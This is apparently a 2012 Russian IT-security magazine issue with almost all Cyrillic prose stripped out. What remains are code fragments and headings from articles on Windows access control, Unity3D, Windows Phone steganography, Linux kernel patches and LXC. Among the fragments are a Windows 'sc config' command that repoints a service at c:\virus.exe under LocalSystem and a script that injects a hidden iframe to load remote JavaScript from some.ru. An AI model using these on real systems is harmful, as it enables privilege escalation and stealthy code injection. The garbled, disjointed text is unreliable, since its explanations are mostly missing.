:
;
crawler;
proxy;

;
;

Python/Ruby;
JavaScript;
Ruby Python.

OS X /
keychain. :
: ,
Wi-Fi-, -,
.
Apple
, root keychain
( locked
keychain). ,
OS X, , .
.

OS X,

. - keychain
securityd
. 20 ,
wrapping ,

.

11 /166/ 2012

:
Steven Seeley
URL:
https://github.com/
mrmee/heaper
:
Windows

ADVANCED SECURITY
TESTING PLATFORM

JSON, XML, Java .

, , CSRF, , ,

.

. Radasma

, ,
,
.
,
ip:port. ,

tcpflow
Radasma.

,
libxslt, Acrobat Reader, Mozilla
Firefox, Chrome, FFmpeg, Microsoft
Excel, libtiff, Webkit, Gzip
.

6
HEAP-HEAP-HEAPER
,
, , , ,
.
,
Immunity Debugger
heaper. :
PEB TEB;
;
calls/jmps, ;
, ,
, ,
, ;
/ FreeListInUse ;
;
;

.

, :
!heaper help <command>

heaper
WinXP,
Windows 7/8.

095

MALWARE

(stannic.man@gmail.com)

WINDOWS
,
ACL/DACL

,
Windows. ,
, ,
, ,
. ,

Windows
.

WARNING

.
,

,

.

096

, Windows . , , ,
.

*nix-like , Windows
(. 1)
, , .

Windows
. Windows
,
.
:
( ), ,
, .
Windows ,

,
. , , ,
: ,
, , , ,
, .
, () , , , ,
, ()
.
alarm- , , kernel-

11 /166/ 2012

 Windows

. 2.

.1.

nt!ObOpenObjectByName.
. , , ,
.
, . , ,
nt!ObCheckObjectAccess nt!SeAccessCheck ( AccessCheck
). , ,
Windows (,
Se*-). ,
TRUE FALSE.
,
. , .

, .
Windows ,
,
.
SID
SID , .
,
,
.
,
. ,
. ,
. TOKEN (. 24). .

. , Windows , ( , ).
, , ,
, APC, DPC, .
,
.
,
OBJECT_HEADER. - .

Windows
SID ( ).
SID , Windows , ,
, . SID
,
, : S-1-5-21-1234567891012345678910-12345678910-1228.
, S-1-1-0 , . S-1-2-0 , , .
, ,
Windows. () , ,

WINDOWS.

()

11 /166/ 2012

097

MALWARE

. 3. WinDBG
CMD.EXE...

. 5. !

. 4. ...

, ,
.
, , (DACL).
,
. ACL
ACE. ACE SID , ACE : , ,
. ,
Active Directory.

?
, , -, . .
.
-, ,
. , ,
Windows , ,
.
2000-
Windows XP,

Local Service Local System.
, Windows SSDP uPnP, Local Service,
, ,
/ (
sc start/ sc stop),
config, binPath
exe :
CMD>sc config stupidService binPath=c:\virus.exe obj= \
".\LocalSystem" password=""
CMD>sc stop stupidService
CMD>sc start stupidService

098

. , ,
, Windows. - - Windows

Everyone .

, -
advapi32!SetFileSecurity ( ) c WRITE_DAC.
,

INT2e/SYSENTER. -
][.
,
-, , -, ,
NtLoadDriver, .
NtLoadDriver, ,
Se_Load_Driver_Privilege AdjustPrivilege(), .

INT2e/SYSENTER.
,

, AccessCheck, PrivilegeCheck,
AreAnyAccessesGranted , ? , :).

, - .

,
Windows , .
, , , , Microsoft.
. ! z

WWW

DVD

Windows Access Control

bit.ly/pjLau,
: bit.ly/NMQkoy bit.ly/VxYwtA.

,
DACL /
, .

11 /166/ 2012

Preview

100

.
,
.
Unity.
Unity? -,
,
. -,
. -
,
,

. ,
?

UNIXOID

1:M
1:N

1:N

105

WINDOWS PHONE

Windows Phone
.
,
.

UNIXOID

124

Linux Containers,
FreeBSD.
?

11 /166/ 2012

112

1:N

N:1

owner

0/1:N
0/1:N
N:M

5:

.

, ,
.

118

Linux
, .
?

SYN/ACK

128

Microsoft,
VMware Citrix.
.

133

.
Windows.

099

C# UNITY3D

- . , ,
, . ,

.

UNITY3D?

Unity3D. ,

. , ,

C#,
. , , Unity3D,
: unity3d.com.
, , .

Unity3D 3D- 2D-. ,

C#, JavaScript Boo,
Win/Mac/Linux, iOS, Android, Web ( -) . ,
. ,
.

100

, , : File New Project.

.
, , .

11 /166/ 2012

Unity3D, 3D-, ,
, 3ds Max, Maya
, (. . 1).
.
Scene
, Game ,
. Hierarchy
,
. Inspector , Project
, , : , , , (
), .
File Save Scene. Scenes ,
Scene1. Project
Scenes . ,

,
.
, Main Camera. Hierarchy
Position Transform
X = 0, Y = 0, Z = 10, Projection
Camera Orthographic,
Size 10. 2D-, ,
.
,
,
(0, 0, 0). .
.
,
. Unity3D ,

. 1. Unity3D

11 /166/ 2012

. , Game Object Create Other

Cube. (
, , ), X = 0, Y = 0, Z = 0.
Game, .
.
Project Materials,
, ,
, Player. Inspector , . !
Player Project
Cube Hierarchy. !
. ? .
, . Game Object Create Other
Directional Light. !
,
Directional Light .


. . Game
Free Aspect,
Standalone (1024 x 768) ,
- Scene,
,
.
Game. !
(0, 10, 0).
, .
,
.
Project Scripts,
C#,
PlayerScript. , Hierarchy , .
,
MonoDevelop
. , MonoDevelop

. 2.

Visual Studio
Unity3D.

Start() Update().
Start() , ,
, , Update()
. , Unity3D: bit.ly/MY5Pd0.
Start() ,
, Update() .


-.
Unity3D ,
, ,
. .
Unity3D Edit Project
Settings Input. Axes.
Horizontal,

(. . 2).
,
, a d
. ,

.

public float speed,

. Unity3D public-
,

101


Unity3D Inspector,
!
, ,
- .
Update() :
float move = Input.GetAxis("Horizontal")
\
* speed * Time.deltaTime;
transform.Translate(Vector3.right *
move);

? .
Input.GetAxis("Horizontal") 1 1,
( , ).
,
,
Time.deltaTime ,

. ,
, .
, FPS
. Translate
.
,
, . ,
transform.Translate(Vector3.right *
move);, Unity3D, , .

:
this.gameObject.transform.Translate \
(Vector3.right * move);

GameObject Unity3D.

GameObject.
Vector3 ,
. static- right,
,
Unity3D. Vector3.
right new Vector3(1, 0, 0),
, ? :)

.
!
. Unity3D
,
. X
,
. Update():
if (transform.position.x <= -13) \
transform.position = new
Vector3(-13, transform.position.y,
transform.position.z);
else if (transform.position.x >= 13) \

102

transform.position = new
Vector3(13, transform.position.y,
transform.position.z);

.

, -! Position Vector3
,
x, y z, ,
,
.
Vector3, .
Play .

,
. ?
,
Project.
.
,
.
Capsule,
:).
Projectile,
-
, . Z .
,
Z
, 0.
,
. Project New
Prefab, Projectile
Hierarchy Projectile
Projectile Project. ! ,
Hierarchy ,
.
: , .

.
,
Components Physics Rigidbody.
-
Rigidbody
. Use
Gravity. Unity3D,
,
Y,
.
Is Kinematic.
, , .
, :). . Projectile
:

public float speed;

void Update () {
float move = this.speed * \
Time.deltaTime;
transform.Translate(Vector3.up *
move);
}

,

.
PlayerScript Update()
:
if (Input.GetKeyDown("space")) {
Vector3 position = new \
Vector3(transform.position.x,
transform.position.y + 1,
transform.position.z);
Instantiate(ProjectilePrefab, \
position, Quaternion.identity);
}

PlayerScript public GameObject, :

public GameObject ProjectilePrefab;

,
. , ,
. ,
.
(
this.gameObject?) Y
,
, .
Instantiate ()
. Instantiate . , GameObject
.
. ,
.
Vector3. .
,
Quatrenion.identity,
.
,
, , .
. ,
,
, .
,
,
Destroy(this.gameObject);,
.
, .

.
(Game Objects
Create Other Sphere)

11 /166/ 2012

) .
-, ,
. ,
-
- ( Rigidbody), -
void OnTriggerEnter(Collider
other), , , . other ,
,
-.
Projectile ,

:

. 3.

!
.


. :
public float MinSpeed;
public float MaxSpeed;
private float currentSpeed;
private float x;
void Start() {
SetPositionAndSpeed();
}
void Update() {
float amtToMove = currentSpeed * \
Time.deltaTime;
transform.Translate(Vector3.down * \
amtToMove);
if (transform.position.y <= -10.5f) {
SetPositionAndSpeed();
}
}
public void SetPositionAndSpeed() {
currentSpeed = Random.Range(MinSpeed, \
MaxSpeed);
x = Random.Range(-12, 12f);
transform.position = new Vector3(x,\
10.8f, 0.0f);
}

,
, ,
,

.

11 /166/ 2012

Update() ,
, public
void SetPositionAndSpeed(). public, ,
.

,
Random. , , ,
transform.position.
, public void
SetPositionAndSpeed() ,
, , ,
.
Unity3D
Inspector
public (, 5 10)
.
! , ,
. ,
.
.

Asteroid,
Sphere Collider,
Is Trigger. , ,
Tag Add tag. Tag
enemy.
,

.
Is Trigger ,
(,

void OnTriggerEnter(Collider other) {

if (other.tag == "enemy") {
Asteroid enemy = (Asteroid)other. \
gameObject.GetComponent
("Asteroid");
enemy.SetPositionAndSpeed();
Destroy(this.gameObject);
}
}

,
.
enemy
GetComponent() Asteroid, public-
SetPositionAndSpeed();,
.
Destroy(),
(
Destroy() , , this.gameObject,
).

. , .
.
, ,
. Unity3D
.
,
- . ,
,
void OnTriggerEnter(Collider other),
, .
,
.
,

(. . 3). PlayerScript
void OnTriggerEnter(Collider
other),
, ,

:
void OnTriggerEnter(Collider other) {
if (other.tag == "enemy") {

103

RIGIDBODY
USE GRAVITY,
IS KINEMATIC

. 4.

Asteroid enemy = (Asteroid)other. \

gameObject.GetComponent
("Asteroid");
enemy.SetPositionAndSpeed();
}

. 5.

0, .
Lose
Lose (-,
!):

}
public Texture backTexture;

. 4.
Rigidbody,

-. Rigidbody
Use Gravity, Is
Kinematic .

GUI
? . , ? , ,
.
.
File Build settings
Add current. (File New Scene)
Scenes Lose.
Build
Settings. ,
1, 0. ,

104

void OnGUI() {
GUI.DrawTexture(new Rect(0, 0, Screen. \
width, Screen.height), backTexture);
}

OnGUI() , .
DrawTexture GUI
. ,
,

. public-.

. ,
, , .
? , Project, Project

public- backTexture
(. . 5). !
Lose .
. ,
. Scene1,
PlayerScript void
OnTriggerEnter(Collider other) enemy.SetPositionAndSpeed();
. :
Application.LoadLevel(1);, 1
Build Settings, .

,
.
!

, ,
,
,
!

Unity3D, , , ,
. z

11 /166/ 2012

yurembo , GenomeGames (www.pgenom.ru)

Windows Phone



, , , .
, .
, . ,
,
?

11 /166/ 2012

105

,
Hello world, , ,
.
, , .

: : ,
, ( ),
, .
. , ,

.
, ,
Panorama Pivot, .

.
.
.

. , ,
,
, , . , .

.
. ,
.
,
.

Windows Phone
.
CameraCaptureTask,
(Chooser).
Windows Phone.
.
( ). ,
CameraCaptureTask .
. PhotoCamera
.

. 1.

106

, ,
. ,
, /
.
.

LET THE BATTLE BEGIN!

. VS 2010, ,
Windows Phone Application. ,
: TextBox, Image, ListBox Button,
- (. 1).
,
: AcceptReturn True, TextWrapping
Wrap.
. .

Add New Item.
,
,
Windows Phone Landscape Page, (PhotoCapture)
Add .
XAML-. ( Grid) :
<Canvas x:Name="Canvas" Width="700" \
HorizontalAlignment="Center" Margin="14,12">
<Canvas.Background>
<VideoBrush x:Name="PhotoViewer" />
</Canvas.Background>
<toolkit:GestureService.GestureListener>
<toolkit:GestureListener DragCompleted= \
"OnDragCompleted" />
</toolkit:GestureService.GestureListener>
</Canvas>

,
, . , Background,
VideoBrush (. 2).
.

, .
,
(
).
toolkit, Windows Phone
Toolkit (silverlight.codeplex.com/releases/view/75888).
, Microsoft.Phone.

. 2.

11 /166/ 2012

 Windows Phone

Controls.Toolkit.dll, c:\
Program Files (x86)\Microsoft SDKs\Windows Phone\v7.1\Toolkit\
Oct11\Bin\. XAML-
: xmlns:toolkit="clr-namespace:Microsoft.Phone.
Controls;assembly=Microsoft.Phone.Controls.Toolkit".

. :
,
, .
. C#-
:
private void OnDragCompleted(object sender, \
DragCompletedGestureEventArgs e) {
this.NavigationService.Navigate(new Uri("/MainPage. \
xaml", UriKind.Relative));
}

, MainPage.xaml. URI
, .
,
, . MainPage.xaml,
, : this.NavigationService.
Navigate(new Uri("/PhotoCapture.xaml", UriKind.Relative));.
, PhotoCapture ,
,
. ,
:),
,
.
Microsoft.Devices,
, .
PhotoCapture : PhotoCamera myCam;.
OnDragCompleted : OnNavigatedTo
, (
), OnNavigatingFrom ( ).
, :
if (PhotoCamera.IsCameraTypeSupported(CameraType.Primary) \
== true) {
myCam = new Microsoft.Devices.PhotoCamera(CameraType. \
Primary);
PhotoViewer.SetSource(myCam);
}
myCam.Initialized += new EventHandler<Microsoft.Devices. \
CameraOperationCompletedEventArgs>(myCam_Initialized);

:
, ( ? WP
, ,
), .

,

?
11 /166/ 2012

VideoBrush
.
, . , , ,
.
( ):
if (myCam != null) {
myCam.Dispose();
myCam.Initialized -= myCam_Initialized;
}

( ,
), , . ,
,
. : myCam.FlashMode
= FlashMode.On;
.
IEnumerable<Size> resList = myCam.AvailableResolutions;
Size res;
res = resList.ElementAt<Size>(5);
myCam.Resolution = res;

.
. , 1600 1200.
.
,
. ,
, ,
. , .
? , .

. OnNavigatedTo CaptureImageAvailable AutoFocusCompleted.
,
,
,
.
, , CameraButtons. ,

: CameraButtons.ShutterKeyPressed +=
OnButtonFullPress;. : ShutterKeyHalfPressed , ShutterKeyReleased .

OnNavigatingFrom.
.
, . API-
: myCam.Focus();.
myCam.CaptureImage();
. : myCam.CancelFocus();.
,
-,
.
. , WP

107

. 3.

()
(). , ,
. ,
.

, ( ).

. ,
MainPage.xaml.cs (OnNavigatedTo OnNavigatingFrom)
OnNavigatedTo PhotoCapture.xaml.
cs (. ) (. 3).

CaptureImageAvailable
.
, . . ,
:
void myCam_CaptureImageAvailable(object sender, \
Microsoft.Devices.ContentReadyEventArgs e) {
...
}

, , .
PhotoCamera,
, . , , . RGB, -,
Windows Phone
JPG, .
, 24- :
. ( )

108

.
,

. ,
, -.

, .

,
GUI, :
Dispatcher.BeginInvoke(delegate() {
...
});

, .
WriteableBitmap.
,
.
BitmapImage,
, : BitmapImage
bi = new BitmapImage();.
: bi.SetSource(e.ImageStream);.
WriteableBitmap: WriteableBitmap
wb = new WriteableBitmap(bi);. Silverlight
WriteableBitmap . ,
SetPixel. , WriteableBitmapEx
Code Plex (writeablebitmapex.codeplex.
com). ( , GetPixel SetPixel),
: DrawLine, DrawRectangle .

11 /166/ 2012

 Windows Phone

, NuGet Manager (. ).
PM> Install-Package
WriteableBitmapEx. ,
. ,
.
Stream,
. GetStream (. ),
,
. ,
.
,
. ,
GetStream .
, . ,
- , .

. .
,
WriteableBitmap, HideTextInImage.
. .

(0, 0) .
.
Color FromArgb,

. ARGB.
RGB.
,
255 . ,
.
.
.
currentKeyByte . . , ,
.
.
: ,
Y,

X .
. .

, .
SetColorComponent. :
(0-R, 1-G, 2-B)
.

FromArgb.
, HideTextInImage,
.
,
SetColorComponent. ,
.

,
( ,
, ,
).
-,

. -,
, ,
. -, ,
.
, ,
. ,
.
,
.

.
, WP.
/ -.
. ! z
WWW
www.codeplex.
com Microsoft
Open Source
,

Microsoft.

NUGET MANAGER
. NuGet Manager.
, .NET-
Visual Studio. NuGet / , ,
. NuGet , .
NuGet Manager, Extension Manager (Tools Extension Manager),
Online Gallery, nuget.
,
(NuGet Manager Package) Download.
, (. 4). , ,
NuGet, Extension Manager,
NuGet- .

11 /166/ 2012

DVD


PhotoMaker,



.

. 4. NuGet Manager

109

(ivinside.blogspot.com)

,

: -,
, , -,
,
.

B, A, -
. , , ,
.

? .
class A:
def __init__(self, v):
self.__q = set(v)

def getval(self):
v = self.__q.pop()
yield v
class B(A):
def getval(self):
for v in self.__q:
yield v
b = B('qwerty')
print [c for c in b.getval()]

print, Python ,
. :
Traceback (most recent call last):
File "q1.py", line 15, in <module>
print [c for c in b.getval()]
File "q1.py", line 11, in getval
for v in self.__q:
AttributeError: B instance has no attribute '_B__q'.

, B '_B__q'.
, __q for v
in self.__q.

110

<script>
(function(url) {
var iframe = document.createElement('iframe');
(iframe.frameElement || iframe).style.cssText = \
"width: 0; height: 0; border: 0";
var target = document.getElementsByTagName('script');
target = target[target.length - 1];
target.parentNode.insertBefore(iframe, target);
var d = iframe.contentWindow.document;
d.open().write('<body onload="'+ \
'var js = document.createElement(\'script\');'+
"js.src = '"+ url +"';"+
'document.body.appendChild(js);">');
d.close();
})('http://some.ru/script.js');
</script>

url,
'http://some.ru/script.
js'. :
iframe
. :
<body onload="var js = document.createElement('script'); \
js.src = 'http://some.ru/script.js';
document.body.appendChild(js);">

11 /166/ 2012

, http://some.ru/script.js.
.
(,
, ) (
,
). iframe
, , , ,
.
,
.

3 5 . 4 ?

2 5-. 5-
3-
, . 4 5- .
(
) 3-
5- . 5- , ( 3-
1 ). 5- . 1 5-
. 3-
5- ,
4 .

, , .
1 . , .
.
2 1 3 . , .
, ! 5 ,
3- ,
. 5-
2 . , ,
3-

C . ,
.
- . - ,
.
.
.
,
. ,
. , ,
. z

1.
1)
2)
3)
4)
5)

String-, :
;
;
;
( strcmp);
,
;
6) stream << .
2. :
#!/usr/bin/python
def is_letter(char):
letters = 'abcdefghijklmnopqrstu \
vwxyz'.split(None)
if str(char).lower() in letters:
return True
else: return False
def wc(s):
l = w = c = 0
for i in range(len(s)):
char = s[i]
c += 1
if not is_letter(char) and not \

11 /166/ 2012

(is_letter(s[i-1]) and
is_letter(i+1) and (char is '-'
or char is '\'')):
w += 1
if char == '\n':
l += 1
return '%d\t%d\t%d\n' % (l, w, c)
if __name__ == "__main__":
import doctest
doctest.testmod()

,
. ,
.
, ,
.
3. , .
,
. ,
. ,
. :
1) ;
2) ;
3) ;

4) ;
5) ;
6) , .
?
4. .
:
, , ,
.
,
,
,
.
( , )
,
,
, .
, -
. , .
? ( ,
,
.)

111

. -

,,



-
.

112

08
11 /163/
/166/ 2012

 . 5

,
- . ,
. ?
, , ,
, . ,
( )
,
, .
.
? master-master
?
?
,
, .
,
.
,
,
. ,
, .

,
, , , , .

, , .
, ? ,
, .
, , .
, :
. .
, , ( )
, . ,
.
. MySQL PostgreSQL. , 3040 .
Mongo, Redis, Neo4j.
MySQL PostgreSQL.
? , .
,
, . ,
.
,
. , MongoDB,
. ?
, .
, . MongoDB ,
, .

11
08 /166/
/163/ 2012
2012

?

.

.
,
, -,

,
?

.

.
,
.

, .
, , ,
/ , .
,
.
?

PostgreSQL

.

,
.
SQL-, SQL-.
,

.

.


:


.

.
,

,
,
,
.
,
, .

,
, share
nothing stateless.

:
;
:

;
:
;
- : ,

113

, ,
, ,
.
, , , , Photosight.ru .
,
,
.
. ,

.

N:2

1:N

1:N

N:M

1:N

1:N

1:M

,
, . , , .
. , .

join , ?
. . ,
. ,
, ,
.
. ,
. join
?
.
,
?
, , , ,
.

, . ,
,
, .
. , -
. , , ,
. ,
.
.
? , , , , ?
.
-.

.
, .
, , (
, , ), . .
, ,
.

114

1:N

1:N

N:1

owner

1:M
N:M

0/1:N
0/1:N

1:N

N:M

1:N

N:M

N:M

N:1

N:1

: ,
, .
:
1.
2.
3.
:
1. , ,
2. -,
3. -, ,
.

, , ,
.

.
. -

,
.
,

. ,
, -

08
11 /163/
/166/ 2012

 . 5

, , .
, , .
, ,
. ,
, , .
Lady Gaga
Facebook. Lady Gaga 69,
.
, .
Lady Gaga
,
Lady Gaga , ,
Lady Gaga.
,
.

,

. , 100 .
,
. , 10 MySQL. MySQL
100 , 10, 20, 100 . , .
,
( )
, , .
. ,
.
.
back-end (-) .
,
back-end , , .

,
. (,
, -
).
,
, .

,
,

, ,
-,
,
.
,
, -

HIGHLOAD-

Highload.

,
-.
HighLoad++ (www.highload.ru).
, ,

.
.

,


MySQL,

.
MySQL

. MySQL
5.5. Mail.Ru
NoSQL
Tarantool,
500600 .
Open Source
.

,

,

.
Erlyvideo
(erlyvideo.org). , .

.

, ( ,
Mail.Ru). ,

60 .

-

.
,

,
.
-

, ,
-
.

11
08 /166/
/163/ 2012
2012

115

- ,
, . ,
.
, .
, .
,
.
-, ,
,
.
.
, . ,
, - . , .
, ( )
. .

MongoDB

MongoDB

Push-

MongoDB

AJAX

MongoDB

MongoDB

MongoDB

Badoo (140 ),
. ,
. ,
, .
?
, ,

.
: 10 , .
, ,
, . ,
10 .

.
, .
,
. .
.
.
. ( ).
,
.
,
?
- .
, , , - .
,
, ( , !)
.
.
,
, ()
, .

, ,
. ,
,
.

116

. ,
. ,
. , ,
. , -,
. , ,
. ,
,
.

.
. , ,
, NoSQL .

. ,

. ,
-
. ,
.

, -

. ,
.

.

. ,
,
.

.



, .

08
11 /163/
/166/ 2012

 . 5

, ,
. , ,
-.
, , . , ,
.
, ,
, . (
, ) :

. ,
, SQL-:
, .
Facebook .
,
,
news feed.
. ,
- . , , : ,
- .
.
, ,
.
, ,
.

MYSQL

MySQL. , .
,
, ,
.
80 ,

, MySQL. ,
1000 20
100 , 2
.
,

- :
. , ,
, SQL-,
;
. .

.
, 12 . , :

;
, MySQL
,
, production ,
, .

11
08 /166/
/163/ 2012
2012

,
,

,


.

,


.
-
.

MySQL
unrolling,
replication log
(CALL
GetUserComet(480145)), ,

. ,
,

.
,

MySQL

,

.

, ,
.
,
, .
, ?



, , .

.

.

. , ,
,
.
, ,

. ! z

117

UNIXOID

(rommanio@yandex.ru)

Julien Harneis

LINUX

, Linux ,
.
, , .
:
, , ,
? ,
. .
, , , -
(SSD-). ,

118

, Reiser4.
: , ,
? : !
. -
,
( !) GPL,
. ,
, . , , . , , ?
.
, ?
, Zen kernel (

11 /166/ 2012

BFS CFS (2009)

Zen kernel Vim. aufs_init()

liquorix), pf-kernel,
rt-preempt, grsecurity , , .
, ,
(UnixBench) , John the Ripper, GZip
MPlayer.
, , ,
.

, sum df du
,
.
Linux-PHC . , NHC Rightmark RMClock Windows.
.
Reiser4 . :
dancing tree,
, ,

.
SLQB . ,
, SLAB SLUB.
, ,
.
FatELF (,
, ELF),
. Mac OS X universal binary.
fbcondecor , -, ! , ,
.

ZEN KERNEL LIQUORIX

Zen kernel (zen-kernel.org)
. , .
? (,
):
Zen-sched , , , BFS (
pf-kernel)
CFS
, Boost
.
BFQ , /.
(, ,
) . ,
,
, .
AUFS2 ,

.
, . , , .
, :
, /media/new, /media/DATA,
.
:
$ sudo mount -t aufs -o \
br:/media/new=rw:/media/DATA=rw,\
create=mfs,sum none /media/union

?
/media/new /media/DATA /media/union, create=mfs , ,

11 /166/ 2012

Zen kernel Ubuntu

12.04 3.3, ,
- . ,
.
:
$ wget http://www.kernel.org/pub/linux/kernel\
/v3.x/linux-3.3.tar.gz && tar xzvf \
linux-3.3.tar.gz

, 3.3 -
.
, , , git:
$
$
$
$

cd linux-3.3
git init
git add .
git commit -m "Initial commit"

119

UNIXOID
.
: FB_S3 S3, FB_VT8623 VIA FB_ARK
ARK Logic. .
CONCURENCY_LEVEL=n, n ,
, ccache, ( ):
$ CC="ccache gcc" CXX="ccache g++" CONCURENCY_LEVEL=2 \
fakeroot make-kpkg --initrd --append-to-version= \
-my kernel_image kernel_headers
$ sudo dpkg -i ../linux-image-3.3.8-zen \
-my+_3.3.8-zen-my+-10.00.Custom_i386.deb \
../linux-headers-3.3.8-zen-my+_3.3.8-zen-my+-10.00. \
Custom_i386.deb
pf-kernel I/O-

:
$ git checkout -b zen-kernel

3.3,
:
$ wget http://downloads.zen-kernel.org/snapshots\
/v3.3_master.diff.gz
$ zcat v3.3_master.diff.gz | patch -p1 --dry-run

, ,
'--dry-run'. :
$ git add . -A
$ git commit -m "Initial commit in branch zen-kernel"

(
, ) make
menuconfig:
$ cp /boot/config-'uname -r' ./.config
$ make menuconfig

configure standard kernel features

(expert users) General Setup kernel debugging kernel hacking
. General
Setup , BFS, Zen-Tune. SLQB . AUFS.
File systems Misc. Filesystems. (
127 ).
fbcondecor, Tile Blitting,

liquorix. ,
Zen,
, . Makefile Zen kernel,
-.

PF-KERNEL
, pf Packet filter,
, , .
post-factum. :
-ck , BFS. EEVDF:
. CFS, -
, 16 .
, bit.ly/1dGHHt , .
BFQ , .
TuxOnIce ,
, , -, , ,
(,
, ), - -
? . , TuxOnIce
Linux. , ,
, , ,
.
IMQ ,
. , , -
. IMQ? , , ,
.
l7-filter Netfilter
. P2P-

kernel-netbook (bit.ly/nNL1SA ) Linux-,
, Asus Eee PC, Acer
Aspire One, MSI Wind, Samsung N-, Dell Mini.
,
(broadcom-wl, stk11xx)
(firmware).
Arch Linux.
rt-preempt preemption model

120

11 /166/ 2012

Skype, Torrent, eDonkey, Kazaa.

, -, , .
3.5
,
UKSM (Ultra Kernel Samepage Merging)
KernelDedup (kerneldedup.org). UKSM , 50100 ,

, ( ).
pf, git, :
$ wget http://pf.natalenko.name/sources/3.3/ \
patch-3.3.6-pf.bz2
$ bzcat patch-3.3.6-pf.bz2 | patch -p1

configs
ASUS G73SW, Dell Inspiron 1525 Samsung
NP900X3A. , . menuconfig.

Kernel Mode Linux (bit.ly/wT04M3)

. ,

.
LIDS (bit.ly/9Qr3NK) .
BadRAM (bit.ly/6jgzno) .
MOSIX (bit.ly/PdM4eq)
(, ).
CPUSETS (www.bullopensource.org/cpuset) 2.6,
CPU
( ) SMP-.

QNET, QoS and Netfilter patchset Linux 2.6.x

(www.opennet.ru/prog/info/2339.shtml),

Linux kernel patch Openwall

(www.openwall.com/linux/README.shtml).

$ make menuconfig

BFQ Enable the block layer IO

Schedulers. , . :
Default I/O Scheduler. TuxOnIce.
Power management Enhanced Hibernation.
Linux ,
. ,
, Checksum pageset2
. l7-filter,
Networking support Networking options Netfilter Core
Netfilter Configuration. ,
.

RT-PREEMPT
rt , ,
realtime. , ,
, , . ?
,
. rt-preempt Linux
. ,
:
-
.
,
, , , .

: bit.ly/MIdjk9.
, , , .

.
. softirq-
. (,
),
- .

3.0, 3.2 3.4.
( git ):
$ wget http://www.kernel.org/pub/linux/kernel\
/projects/rt/3.2/older/patch-3.2-rt10.patch.gz
$ zcat patch-3.2-rt10.patch.gz | patch -p1

, .
menuconfig
Processor type and features. , High Resolution Timer Support. Preemption model
Preemptible kernel Fully preemptible
kernel. ,
. , ,
. Kernel hacking,
. menuconfig ,
.

GRSECURITY

grsecurity

11 /166/ 2012

Grsecurity (bit.ly/4uMMYc), ,
2001
Openwall Solar
Designer. , PaX
RBAC
, SELinux. ,
.
/dev/mem, /dev/kmem /dev/port (
). /
ioperm/ioml,

121

UNIXOID

grsecurity

.
.
PaX ,
kernel panic ( ),
,
,
UID.
/proc. , ( /
) ,
.
chroot. , , chroot, chroot, mknod
TPE , root
, .
TCP/UDP blackhole RST/ICMP,
. , , "-j DROP" iptables.
ASLR ,
, mmap().

UnixBench

Customize Configurations. ,
, ( gradm,
grsecurity),
, / .
grsecurity
gcc, :
$ sudo apt-get install gcc-4.6-plugin-dev

grsecurity 3.2. (- git

):

, .
, Zen kernel .
? , , Zen kernel,
. pf-kernel .
.

, ,
, . rt-preempt .
grsecurity , ,
. ,
. z

$ wget http://www.kernel.org/pub/linux/kernel/ \
v3.0/patch-3.2.27.bz2
$ bzcat patch-3.2.27.bz2 | patch -p1
$ wget http://grsecurity.net/stable/ \
grsecurity-2.9.1-3.2.27-201208151951.patch
$ patch -p1 < grsecurity-2.9.1-3.2.27-2012081519 \
51.patch

, ,
.
menuconfig Securuty options Grsecurity . Configuration method Automathic, Usage
Type , . Default
Special Groups GID, /proc. ,

John the Ripper (FreeBSD

MD5), .

MPlayer,

Gzip,

UnixBench,

Ubuntu 12.04

8307

12,584

38,105

467,6

Zen kernel

7312

14,876

37,435

509

pf-kernel

8284

12,137

38,590

490,4

rt-preempt

8198

13,028

38,989

324,2

WARNING

DVD

grsecurity
X.Org,

.

122

11 /166/ 2012

UNIXOID

(execbit.ru)

LXC

, ,
,
.
,
.
,
LXC.

.

?
LXC Linux, FreeBSD Jail, Solaris Zones OpenVZ,
, .
Linux cgroups
( 2.6.29) ,
OpenVZ. LXC
Linux-,
, ,
, , ,
. cgroups
,
.
LXC .
,
,
,
. LXC
,

,
,
.

! ?

Linux . VirtualBox,

. OpenVZ,
, QEMU,
.
: VirtualBox QEMU
, OpenVZ
, , chroot
VServer, , .
, LXC (Linux Containers), .

124

, LXC, , ,
bridge-utils debootstrap,
Debian
Ubuntu:
# apt-get install lxc debootstrap bridge-utils

debootstrap
febootstrap,
Fedora. , , .
:

11 /166/ 2012

LXC-

# ifconfig eth0 down

# brctl addbr br0
# brctl setfd br0 0

# echo "cgroup /sys/fs/cgroup cgroup defaults 0 0 > \

/etc/fstab
# mount cgroup

(eth0):

lxc-checkconfig, ,
LXC:

# brctl addif br0 eth0

# ifconfig eth0 0.0.0.0 up

# lxc-checkconfig

IP-,
eth0:
# ifconfig br0 192.168.1.2/24 up
# route add default gw 192.168.1.1

,
/etc/network/interfaces:
auto lo
iface lo inet loopback
auto br0
iface br0 inet static
#
bridge_ports eth0
bridge_stp off
bridge_fd 0
# IP-
address 192.168.1.2
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

K ,
enabled (. LXC), , ().
lxc-create, . , LXC,
,
. LXC
, /usr/lib/lxc/templates/. , ,
'-t' lxc-create,
lxc-. :
# lxc-create -n node01 -t ubuntu

node01 , ubuntu . ,
, '--help'.
# lxc-create -t ubuntu --help

DHCP,
, iface br0 inet static
iface br0 inet dhcp. LXC , cgroup . Ubuntu
,
/etc/fstab:

/var/lib/lxc/node01/.
rootfs,
fstab ( LXC
/etc/fstab ). config,
.
:

fstab

# (hostname)
lxc.utsname = node01
# (Ethernet)
lxc.network.type = veth
#
lxc.network.flags = up
# br0
lxc.network.link = br0

11 /166/ 2012

125

UNIXOID
3. LXC,
:
# invoke-rc.d lxc start

,
( -), .
:

# IP-
lxc.network.ipv4 = 192.168.2.50/24

MAC-:
lxc.network.name = eth0
lxc.network.hwaddr = ac:de:48:00:00:01

DNS- /etc/resolv.conf
:
# echo nameserver 8.8.8.8 > \
/var/lib/lxc/node01/rootfs/etc/resolv.conf

.
:
# lxc-start -n node01

, :
# lxc-console -n node01

root.
: , , .
:

# lxc-cgroup -n node01 memory.limit_in_bytes 128M

# lxc-cgroup -n node01 mcpu.shares 1 512
# lxc-cgroup -n node01 cpuset.cpus 1

,
:
lxc.cgroup.memory.limit_in_bytes = 128M
lxc.cgroup.cpu.shares = 512
lxc.cgroup.cpuset.cpus = 1

, , 128 ,
, ,

cgroup
cpu.shares ( ,
, ,
cgroup). ,
( )
, cpu.shares.
cpu.shares 512,
1024, , ,
1, 2. ,
,
. , ,
, , 0,3 ( ).
, swap-:
lxc.cgroup.memory.memsw.limit_in_bytes = 128M

# lxc-stop -n node01

, :
# lxc-destroy -n node01

TIPSNTRICKS
,
,
